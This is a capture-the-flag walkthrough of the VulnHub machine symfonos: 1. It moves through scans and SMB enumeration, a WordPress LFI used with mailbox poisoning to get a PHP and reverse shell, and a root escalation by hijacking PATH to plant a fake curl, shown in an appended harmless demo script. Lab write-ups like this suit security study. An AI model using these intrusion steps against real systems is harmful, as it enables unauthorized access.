VulnHub: symfonos: 1

Initial foothold

1. Network discovery

My target is 192.168.60.131.

2. Port scan

There are five open ports: 22, 25, 80, 139 and 445.

3. OS and service scan

Four services are identified:

  • 22/tcp ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
  • 25/tcp smtp Postfix smtpd
  • 80/tcp http Apache httpd 2.4.25 ((Debian))
  • 139/tcp and 445/tcp netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

4. Vuln scan

A directory was discovered on HTTP port 80.

Service Enumeration

1. Starting with an SSH connection on port 22

Connection verified

2. Connect to SMTP on port 25

Connection verified

3. nikto scan on HTTP

More directories to explore

4. Directory scan with gobuster; I used three different wordlists. Then I accessed the site and explored every possible page; not much information was revealed.

5. Scan SMB (ports 139 and 445) with nmap

There are two shares: anonymous and helios.

6. Access the SMB share anonymous

There is an attention.txt file.

Download and read it

It’s a password hint.

Save these passwords as ‘pass_from_smb.txt’

Now I know there is a username, helios, and three possible passwords.

7. Access the SMB share helios. It is not accessible anonymously, so I'll try with the username helios.

Download them

Read them

There is a string "/h3l105/". My guess is that it's a hidden directory on the HTTP service.

8. Access http://192.168.60.131/h3l105/

It’s a WordPress site.

View the page source; there's a "symfonos.local" hostname.

Edit /etc/hosts, adding the IP and the hostname.

Refresh the site; now it renders properly (the WordPress install links its assets by that hostname, so without the hosts entry the page loads unstyled).

9. Enumerate http://symfonos.local/h3l105/; not much on the site.

nikto scan

Directory scan

10. WordPress scan

Plugin scan

Plugin mail-masta v1.0 has an LFI vulnerability.

11. WordPress password bruteforcing

No passwords found

Change wordlist to rockyou.txt

I will leave it running and check back later.

Beautify the result by viewing the page source.

2. Since the machine has an SMTP service, which I can also access, I may be able to read the service's related files through the LFI.

Starting with "/var/log/mail.log"

No result

Another possibility is helios's mailbox; the path is "/var/mail/helios".

I got the result. From this, I can inject a PHP shell into helios's mail and access it with the LFI.

3. Access SMTP service and inject the shell

4. Test the shell

Now, the shell is working as expected.

5. Reverse shell

Prepare listener

I will use commands from this cheatsheet.

After many tries, I succeeded with this command

Here’s how I did it.

Intercept the LFI request with Burp Suite

Send the request to the Repeater

URL-encode the reverse shell command

Paste it to the request and send

Back to listener, now I got the shell.

Privilege Escalation

1. Upgrade to a TTY shell

2. Explore the machine

I identified a binary called statuscheck

Run it

3. I suspected that it must be SUID.

4. Run strings on statuscheck to identify any commands used inside the binary.

It calls “curl” command.

5. Create a fake curl earlier in PATH

Now I’m root.

6. Read the flag
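The privilege escalation in steps 2 to 6, as an added example that is not code from the original post. It only works because the binary invokes `curl` by bare name: if `strings` had shown an absolute path such as /usr/bin/curl, a PATH hijack would do nothing. Assumptions: the binary is ./statuscheck in the current directory and it runs `curl -I http://localhost` (the post only says that strings found "curl"); the demo stands the SUID binary in with `sh -c` so it runs harmlessly off-target, and the planted curl just reports itself instead of spawning a shell.

```shell
#!/bin/sh
# Added example, not from the original post. Assumptions are marked.

# Checks to run on the target first (not executed here):
#   find / -perm -4000 -type f 2>/dev/null   # is statuscheck really SUID?
#   strings ./statuscheck | grep curl        # bare "curl" or an absolute path?
# Print strings that reference a command without a leading slash, i.e. the
# ones resolved through PATH. Usage: bare_command_refs ./statuscheck curl
bare_command_refs() { strings "$1" | grep -E "(^|[^/])$2"; }

# Plant a fake curl. On the target its body would be "/bin/sh" (Debian's
# /bin/sh is dash, which keeps the effective uid; bash would need -p).
# Here it only announces itself so the demo is harmless and self-contained.
plant_fake_curl() {
cat > "$1/curl" <<'EOF'
#!/bin/sh
echo "fake curl running as uid $(id -u): $*"
EOF
  chmod +x "$1/curl"
}

# Show which curl wins once the fake directory is first in PATH.
which_curl_with() { PATH="$1:$PATH" command -v curl; }

# Run the SUID program with the poisoned PATH. Off-target, sh -c stands in
# for ./statuscheck; on the box this line is:  PATH="$dir:$PATH" ./statuscheck
run_with_hijack() {
  local dir
  dir=$(mktemp -d)
  plant_fake_curl "$dir"
  PATH="$dir:$PATH" sh -c 'curl -I http://localhost'
  rm -rf "$dir"
}
```

The fix on the defensive side is the mirror image of the attack: a SUID program must call helpers by absolute path or reset PATH itself, since the caller controls the environment it inherits.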